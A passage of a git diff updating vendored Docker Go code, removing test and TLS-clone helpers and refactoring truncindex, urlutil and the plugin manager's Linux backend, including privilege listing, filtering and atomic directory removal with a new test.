+func GetWinsize(fd uintptr) (*Winsize, error) { + uws, err := unix.IoctlGetWinsize(int(fd), unix.TIOCGWINSZ) + ws := &Winsize{Height: uws.Row, Width: uws.Col, x: uws.Xpixel, y: uws.Ypixel} + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. +func SetWinsize(fd uintptr, ws *Winsize) error { + uws := &unix.Winsize{Row: ws.Height, Col: ws.Width, Xpixel: ws.x, Ypixel: ws.y} + return unix.IoctlSetWinsize(int(fd), unix.TIOCSWINSZ, uws) +} diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go deleted file mode 100644 index 6da8518a5e..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go +++ /dev/null @@ -1,97 +0,0 @@ -// Package assert contains functions for making assertions in unit tests -package assert - -import ( - "fmt" - "path/filepath" - "reflect" - "runtime" - "strings" - - "github.com/davecgh/go-spew/spew" -) - -// TestingT is an interface which defines the methods of testing.T that are -// required by this package -type TestingT interface { - Fatalf(string, ...interface{}) -} - -// Equal compare the actual value to the expected value and fails the test if -// they are not equal. -func Equal(t TestingT, actual, expected interface{}) { - if expected != actual { - fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual) - } -} - -//EqualStringSlice compares two slices and fails the test if they do not contain -// the same items. -func EqualStringSlice(t TestingT, actual, expected []string) { - if len(actual) != len(expected) { - fatal(t, "Expected (length %d): %q\nActual (length %d): %q", - len(expected), expected, len(actual), actual) - } - for i, item := range actual { - if item != expected[i] { - fatal(t, "Slices differ at element %d, expected %q got %q", - i, expected[i], item) - } - } -} - -// NilError asserts that the error is nil, otherwise it fails the test. 
-func NilError(t TestingT, err error) { - if err != nil { - fatal(t, "Expected no error, got: %s", err.Error()) - } -} - -// DeepEqual compare the actual value to the expected value and fails the test if -// they are not "deeply equal". -func DeepEqual(t TestingT, actual, expected interface{}) { - if !reflect.DeepEqual(actual, expected) { - fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n", - expected, spew.Sdump(expected), actual, spew.Sdump(actual)) - } -} - -// Error asserts that error is not nil, and contains the expected text, -// otherwise it fails the test. -func Error(t TestingT, err error, contains string) { - if err == nil { - fatal(t, "Expected an error, but error was nil") - } - - if !strings.Contains(err.Error(), contains) { - fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error()) - } -} - -// Contains asserts that the string contains a substring, otherwise it fails the -// test. -func Contains(t TestingT, actual, contains string) { - if !strings.Contains(actual, contains) { - fatal(t, "Expected '%s' to contain '%s'", actual, contains) - } -} - -// NotNil fails the test if the object is nil -func NotNil(t TestingT, obj interface{}) { - if obj == nil { - fatal(t, "Expected non-nil value.") - } -} - -func fatal(t TestingT, format string, args ...interface{}) { - t.Fatalf(errorSource()+format, args...) 
-} - -// See testing.decorate() -func errorSource() string { - _, filename, line, ok := runtime.Caller(3) - if !ok { - return "" - } - return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line) -} diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go deleted file mode 100644 index 110b2e6a79..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/pkg.go +++ /dev/null @@ -1 +0,0 @@ -package testutil diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go deleted file mode 100644 index 0e09d99dae..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go +++ /dev/null @@ -1,36 +0,0 @@ -package tempfile - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/testutil/assert" -) - -// TempFile is a temporary file that can be used with unit tests. TempFile -// reduces the boilerplate setup required in each test case by handling -// setup errors. 
-type TempFile struct { - File *os.File -} - -// NewTempFile returns a new temp file with contents -func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile { - file, err := ioutil.TempFile("", prefix+"-") - assert.NilError(t, err) - - _, err = file.Write([]byte(content)) - assert.NilError(t, err) - file.Close() - return &TempFile{File: file} -} - -// Name returns the filename -func (f *TempFile) Name() string { - return f.File.Name() -} - -// Remove removes the file -func (f *TempFile) Remove() { - os.Remove(f.Name()) -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go deleted file mode 100644 index e4dec3a5d1..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go +++ /dev/null @@ -1,11 +0,0 @@ -// +build go1.8 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.7 that doesn't include this method in stdlib. -func Clone(c *tls.Config) *tls.Config { - return c.Clone() -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go deleted file mode 100644 index 0b816650ec..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go +++ /dev/null @@ -1,31 +0,0 @@ -// +build go1.6,!go1.7 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.6 that doesn't include this method in stdlib. 
-func Clone(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - } -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go deleted file mode 100644 index 0d5b448fec..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go +++ /dev/null @@ -1,33 +0,0 @@ -// +build go1.7,!go1.8 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.7 that doesn't include this method in stdlib. 
-func Clone(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, - Renegotiation: c.Renegotiation, - } -} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go index 02610b8b7e..d5c840cf13 100644 --- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go @@ -1,7 +1,7 @@ // Package truncindex provides a general 'index tree', used by Docker // in order to be able to reference containers by only a few unambiguous // characters of their id. -package truncindex +package truncindex // import "github.com/docker/docker/pkg/truncindex" import ( "errors" @@ -77,10 +77,7 @@ func (idx *TruncIndex) addID(id string) error { func (idx *TruncIndex) Add(id string) error { idx.Lock() defer idx.Unlock() - if err := idx.addID(id); err != nil { - return err - } - return nil + return idx.addID(id) } // Delete removes an ID from the TruncIndex. If there are multiple IDs @@ -128,8 +125,13 @@ func (idx *TruncIndex) Get(s string) (string, error) { return "", ErrNotExist } -// Iterate iterates over all stored IDs, and passes each of them to the given handler. +// Iterate iterates over all stored IDs and passes each of them to the given +// handler. 
Take care that the handler method does not call any public +// method on truncindex as the internal locking is not reentrant/recursive +// and will result in deadlock. func (idx *TruncIndex) Iterate(handler func(id string)) { + idx.Lock() + defer idx.Unlock() idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error { handler(string(prefix)) return nil diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go index 8197baf7d4..e259017982 100644 --- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go @@ -1,15 +1,16 @@ -package truncindex +package truncindex // import "github.com/docker/docker/pkg/truncindex" import ( "math/rand" "testing" + "time" "github.com/docker/docker/pkg/stringid" ) // Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix. func TestTruncIndex(t *testing.T) { - ids := []string{} + var ids []string index := NewTruncIndex(ids) // Get on an empty index if _, err := index.Get("foobar"); err == nil { @@ -98,6 +99,7 @@ func TestTruncIndex(t *testing.T) { assertIndexGet(t, index, id, id, false) assertIndexIterate(t) + assertIndexIterateDoNotPanic(t) } func assertIndexIterate(t *testing.T) { @@ -121,6 +123,28 @@ func assertIndexIterate(t *testing.T) { }) } +func assertIndexIterateDoNotPanic(t *testing.T) { + ids := []string{ + "19b36c2c326ccc11e726eee6ee78a0baf166ef96", + "28b36c2c326ccc11e726eee6ee78a0baf166ef96", + } + + index := NewTruncIndex(ids) + iterationStarted := make(chan bool, 1) + + go func() { + <-iterationStarted + index.Delete("19b36c2c326ccc11e726eee6ee78a0baf166ef96") + }() + + index.Iterate(func(targetId string) { + if targetId == "19b36c2c326ccc11e726eee6ee78a0baf166ef96" { + iterationStarted <- true + time.Sleep(100 * time.Millisecond) + } + }) +} + func assertIndexGet(t *testing.T, index *TruncIndex, input, 
expectedResult string, expectError bool) { if result, err := index.Get(input); err != nil && !expectError { t.Fatalf("Unexpected error getting '%s': %s", input, err) diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go index 44152873b1..9cf348c723 100644 --- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go @@ -1,6 +1,6 @@ // Package urlutil provides helper function to check urls kind. // It supports http urls, git urls and transport url (tcp://, …) -package urlutil +package urlutil // import "github.com/docker/docker/pkg/urlutil" import ( "regexp" @@ -9,7 +9,15 @@ import ( var ( validPrefixes = map[string][]string{ - "url": {"http://", "https://"}, + "url": {"http://", "https://"}, + + // The github.com/ prefix is a special case used to treat context-paths + // starting with `github.com` as a git URL if the given path does not + // exist locally. The "github.com/" prefix is kept for backward compatibility, + // and is a legacy feature. + // + // Going forward, no additional prefixes should be added, and users should + // be encouraged to use explicit URLs (https://github.com/user/repo.git) instead. "git": {"git://", "github.com/", "git@"}, "transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"}, } @@ -29,12 +37,6 @@ func IsGitURL(str string) bool { return checkURL(str, "git") } -// IsGitTransport returns true if the provided str is a git transport by inspecting -// the prefix of the string for known protocols used in git. -func IsGitTransport(str string) bool { - return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") -} - // IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL. 
func IsTransportURL(str string) bool { return checkURL(str, "transport") diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go index 75eb464fe5..6660368316 100644 --- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go @@ -1,4 +1,4 @@ -package urlutil +package urlutil // import "github.com/docker/docker/pkg/urlutil" import "testing" @@ -27,35 +27,21 @@ var ( } ) -func TestValidGitTransport(t *testing.T) { - for _, url := range gitUrls { - if IsGitTransport(url) == false { - t.Fatalf("%q should be detected as valid Git prefix", url) - } - } - - for _, url := range incompleteGitUrls { - if IsGitTransport(url) == true { - t.Fatalf("%q should not be detected as valid Git prefix", url) - } - } -} - func TestIsGIT(t *testing.T) { for _, url := range gitUrls { - if IsGitURL(url) == false { + if !IsGitURL(url) { t.Fatalf("%q should be detected as valid Git url", url) } } for _, url := range incompleteGitUrls { - if IsGitURL(url) == false { + if !IsGitURL(url) { t.Fatalf("%q should be detected as valid Git url", url) } } for _, url := range invalidGitUrls { - if IsGitURL(url) == true { + if IsGitURL(url) { t.Fatalf("%q should not be detected as valid Git prefix", url) } } @@ -63,7 +49,7 @@ func TestIsGIT(t *testing.T) { func TestIsTransport(t *testing.T) { for _, url := range transportUrls { - if IsTransportURL(url) == false { + if !IsTransportURL(url) { t.Fatalf("%q should be detected as valid Transport url", url) } } diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go index 1137db51b8..22db82129b 100644 --- a/vendor/github.com/docker/docker/pkg/useragent/useragent.go +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go @@ -1,6 +1,6 @@ // Package useragent provides helper functions to pack // version information into a single 
User-Agent header. -package useragent +package useragent // import "github.com/docker/docker/pkg/useragent" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go index 0ad7243a6d..76868dc852 100644 --- a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go @@ -1,4 +1,4 @@ -package useragent +package useragent // import "github.com/docker/docker/pkg/useragent" import "testing" diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go index 33200d8efa..044e14b0cb 100644 --- a/vendor/github.com/docker/docker/plugin/backend_linux.go +++ b/vendor/github.com/docker/docker/plugin/backend_linux.go @@ -1,40 +1,49 @@ -// +build linux - -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "archive/tar" "compress/gzip" + "context" "encoding/json" - "fmt" "io" "io/ioutil" "net/http" "os" "path" "path/filepath" - "sort" + "runtime" "strings" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" + 
refstore "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) +var acceptedPluginFilterTags = map[string]bool{ + "enabled": true, + "capability": true, +} + // Disable deactivates a plugin. This means resources (volumes, networks) cant use them. func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error { p, err := pm.config.Store.GetV2Plugin(refOrID) @@ -46,12 +55,19 @@ func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) er pm.mu.RUnlock() if !config.ForceDisable && p.GetRefCount() > 0 { - return fmt.Errorf("plugin %s is in use", p.Name()) + return errors.WithStack(inUseError(p.Name())) + } + + for _, typ := range p.GetTypes() { + if typ.Capability == authorization.AuthZApiImplements { + pm.config.AuthzMiddleware.RemovePlugin(p.Name()) + } } if err := pm.disable(p, c); err != nil { return err } + pm.publisher.Publish(EventDisable{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.GetID(), refOrID, "disable") return nil } @@ -67,6 +83,7 @@ func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) erro if err := pm.enable(p, c, false); err != nil { return err } + pm.publisher.Publish(EventEnable{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.GetID(), refOrID, "enable") return nil } @@ -125,7 +142,7 @@ func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) { func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) { if d != s.configDigest { - return nil, digest.ErrDigestNotFound + return nil, errNotFound("digest not found") } return s.config, nil } @@ -134,7 +151,12 @@ func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } -func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { +func (s *tempConfigStore) PlatformFromConfig(c []byte) 
(*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} + +func computePrivileges(c types.PluginConfig) types.PluginPrivileges { var privileges types.PluginPrivileges if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" { privileges = append(privileges, types.PluginPrivilege{ @@ -143,6 +165,20 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { Value: []string{c.Network.Type}, }) } + if c.IpcHost { + privileges = append(privileges, types.PluginPrivilege{ + Name: "host ipc namespace", + Description: "allow access to host ipc namespace", + Value: []string{"true"}, + }) + } + if c.PidHost { + privileges = append(privileges, types.PluginPrivilege{ + Name: "host pid namespace", + Description: "allow access to host pid namespace", + Value: []string{"true"}, + }) + } for _, mount := range c.Mounts { if mount.Source != nil { privileges = append(privileges, types.PluginPrivilege{ @@ -176,7 +212,7 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { }) } - return privileges, nil + return privileges } // Privileges pulls a plugin config and computes the privileges required to install it. 
@@ -205,34 +241,35 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead } var config types.PluginConfig if err := json.Unmarshal(cs.config, &config); err != nil { - return nil, err + return nil, errdefs.System(err) } - return computePrivileges(config) + return computePrivileges(config), nil } // Upgrade upgrades a plugin func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { p, err := pm.config.Store.GetV2Plugin(name) if err != nil { - return errors.Wrap(err, "plugin must be installed before upgrading") + return err } if p.IsEnabled() { - return fmt.Errorf("plugin must be disabled before upgrading") + return errors.Wrap(enabledError(p.Name()), "plugin must be disabled before upgrading") } pm.muGC.RLock() defer pm.muGC.RUnlock() // revalidate because Pull is public - nameref, err := reference.ParseNamed(name) - if err != nil { - return errors.Wrapf(err, "failed to parse %q", name) + if _, err := reference.ParseNormalizedNamed(name); err != nil { + return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name) } - name = reference.WithDefaultTag(nameref).String() tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + if err != nil { + return errors.Wrap(errdefs.System(err), "error preparing upgrade") + } defer os.RemoveAll(tmpRootFSDir) dm := &downloadManager{ @@ -266,22 +303,25 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string } // Pull pulls a plugin, check if the correct privileges are provided and install the plugin. 
-func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer, opts ...CreateOpt) (err error) { pm.muGC.RLock() defer pm.muGC.RUnlock() // revalidate because Pull is public - nameref, err := reference.ParseNamed(name) + nameref, err := reference.ParseNormalizedNamed(name) if err != nil { - return errors.Wrapf(err, "failed to parse %q", name) + return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name) } - name = reference.WithDefaultTag(nameref).String() + name = reference.FamiliarString(reference.TagNameOnly(nameref)) if err := pm.config.Store.validateName(name); err != nil { - return err + return errdefs.InvalidParameter(err) } tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + if err != nil { + return errors.Wrap(errdefs.System(err), "error preparing pull") + } defer os.RemoveAll(tmpRootFSDir) dm := &downloadManager{ @@ -307,20 +347,58 @@ func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, m return err } - p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges) + refOpt := func(p *v2.Plugin) { + p.PluginObj.PluginReference = ref.String() + } + optsList := make([]CreateOpt, 0, len(opts)+1) + optsList = append(optsList, opts...) + optsList = append(optsList, refOpt) + + p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges, optsList...) if err != nil { return err } - p.PluginObj.PluginReference = ref.String() + pm.publisher.Publish(EventCreate{Plugin: p.PluginObj}) return nil } // List displays the list of plugins and associated metadata. 
-func (pm *Manager) List() ([]types.Plugin, error) { +func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) { + if err := pluginFilters.Validate(acceptedPluginFilterTags); err != nil { + return nil, err + } + + enabledOnly := false + disabledOnly := false + if pluginFilters.Contains("enabled") { + if pluginFilters.ExactMatch("enabled", "true") { + enabledOnly = true + } else if pluginFilters.ExactMatch("enabled", "false") { + disabledOnly = true + } else { + return nil, invalidFilter{"enabled", pluginFilters.Get("enabled")} + } + } + plugins := pm.config.Store.GetAll() out := make([]types.Plugin, 0, len(plugins)) + +next: for _, p := range plugins { + if enabledOnly && !p.PluginObj.Enabled { + continue + } + if disabledOnly && p.PluginObj.Enabled { + continue + } + if pluginFilters.Contains("capability") { + for _, f := range p.GetTypes() { + if !pluginFilters.Match("capability", f.Capability) { + continue next + } + } + } out = append(out, p.PluginObj) } return out, nil @@ -333,7 +411,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header return err } - ref, err := reference.ParseNamed(p.Name()) + ref, err := reference.ParseNormalizedNamed(p.Name()) if err != nil { return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name()) } @@ -369,7 +447,8 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header pm: pm, plugin: p, } - ls := &pluginLayerProvider{ + lss := make(map[string]distribution.PushLayerProvider) + lss[runtime.GOOS] = &pluginLayerProvider{ pm: pm, plugin: p, } @@ -392,7 +471,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header RequireSchema2: true, }, ConfigMediaType: schema2.MediaTypePluginConfig, - LayerStore: ls, + LayerStores: lss, UploadManager: uploadManager, } @@ -411,8 +490,8 @@ func (r *pluginReference) References(id digest.Digest) []reference.Named { return []reference.Named{r.name} } -func (r *pluginReference) 
ReferencesByName(ref reference.Named) []reference.Association { - return []reference.Association{ +func (r *pluginReference) ReferencesByName(ref reference.Named) []refstore.Association { + return []refstore.Association{ { Ref: r.name, ID: r.pluginID, @@ -422,7 +501,7 @@ func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Asso func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) { if r.name.String() != ref.String() { - return digest.Digest(""), reference.ErrDoesNotExist + return digest.Digest(""), refstore.ErrDoesNotExist } return r.pluginID, nil } @@ -465,6 +544,11 @@ func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } +func (s *pluginConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} + type pluginLayerProvider struct { pm *Manager plugin *v2.Plugin @@ -542,10 +626,10 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { if !config.ForceRemove { if p.GetRefCount() > 0 { - return fmt.Errorf("plugin %s is in use", p.Name()) + return inUseError(p.Name()) } if p.IsEnabled() { - return fmt.Errorf("plugin %s is enabled", p.Name()) + return enabledError(p.Name()) } } @@ -560,52 +644,19 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { }() id := p.GetID() - pm.config.Store.Remove(p) pluginDir := filepath.Join(pm.config.Root, id) - if err := recursiveUnmount(pm.config.Root); err != nil { - logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err) - } - if err := os.RemoveAll(pluginDir); err != nil { - logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err) - } - pm.config.LogPluginEvent(id, name, "remove") - return nil -} -func getMounts(root string) ([]string, error) { - infos, err := mount.GetMounts() - if err != nil { - return nil, 
errors.Wrap(err, "failed to read mount table while performing recursive unmount") + if err := mount.RecursiveUnmount(pluginDir); err != nil { + return errors.Wrap(err, "error unmounting plugin data") } - var mounts []string - for _, m := range infos { - if strings.HasPrefix(m.Mountpoint, root) { - mounts = append(mounts, m.Mountpoint) - } - } - - return mounts, nil -} - -func recursiveUnmount(root string) error { - mounts, err := getMounts(root) - if err != nil { + if err := atomicRemoveAll(pluginDir); err != nil { return err } - // sort in reverse-lexicographic order so the root mount will always be last - sort.Sort(sort.Reverse(sort.StringSlice(mounts))) - - for i, m := range mounts { - if err := mount.Unmount(m); err != nil { - if i == len(mounts)-1 { - return errors.Wrapf(err, "error performing recursive unmount on %s", root) - } - logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount") - } - } - + pm.config.Store.Remove(p) + pm.config.LogPluginEvent(id, name, "remove") + pm.publisher.Publish(EventRemove{Plugin: p.PluginObj}) return nil } @@ -627,25 +678,25 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, pm.muGC.RLock() defer pm.muGC.RUnlock() - ref, err := reference.ParseNamed(options.RepoName) + ref, err := reference.ParseNormalizedNamed(options.RepoName) if err != nil { return errors.Wrapf(err, "failed to parse reference %v", options.RepoName) } if _, ok := ref.(reference.Canonical); ok { return errors.Errorf("canonical references are not permitted") } - taggedRef := reference.WithDefaultTag(ref) - name := taggedRef.String() + name := reference.FamiliarString(reference.TagNameOnly(ref)) if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin() return err } tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") - defer os.RemoveAll(tmpRootFSDir) if err != nil { return errors.Wrap(err, "failed to create temp directory") } + defer 
os.RemoveAll(tmpRootFSDir) + var configJSON []byte rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON) @@ -655,7 +706,7 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, } defer rootFSBlob.Close() gzw := gzip.NewWriter(rootFSBlob) - layerDigester := digest.Canonical.New() + layerDigester := digest.Canonical.Digester() rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash())) if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil { @@ -700,6 +751,8 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, DiffIds: []string{layerDigester.Digest().String()}, } + config.DockerVersion = dockerversion.Version + configBlob, err := pm.blobStore.New() if err != nil { return err @@ -717,8 +770,9 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, if err != nil { return err } - p.PluginObj.PluginReference = taggedRef.String() + p.PluginObj.PluginReference = name + pm.publisher.Publish(EventCreate{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.PluginObj.ID, name, "create") return nil @@ -788,3 +842,35 @@ func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser { }() return pr } + +func atomicRemoveAll(dir string) error { + renamed := dir + "-removing" + + err := os.Rename(dir, renamed) + switch { + case os.IsNotExist(err), err == nil: + // even if `dir` doesn't exist, we can still try and remove `renamed` + case os.IsExist(err): + // Some previous remove failed, check if the origin dir exists + if e := system.EnsureRemoveAll(renamed); e != nil { + return errors.Wrap(err, "rename target already exists and could not be removed") + } + if _, err := os.Stat(dir); os.IsNotExist(err) { + // origin doesn't exist, nothing left to do + return nil + } + + // attempt to rename again + if err := os.Rename(dir, renamed); err != nil { + return errors.Wrap(err, "failed to rename dir for atomic removal") + } + default: + return 
errors.Wrap(err, "failed to rename dir for atomic removal") + } + + if err := system.EnsureRemoveAll(renamed); err != nil { + os.Rename(renamed, dir) + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/plugin/backend_linux_test.go b/vendor/github.com/docker/docker/plugin/backend_linux_test.go new file mode 100644 index 0000000000..81cf2ebb76 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_linux_test.go @@ -0,0 +1,81 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestAtomicRemoveAllNormal(t *testing.T) { + dir, err := ioutil.TempDir("", "atomic-remove-with-normal") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try to make sure this gets cleaned up + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(dir); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", 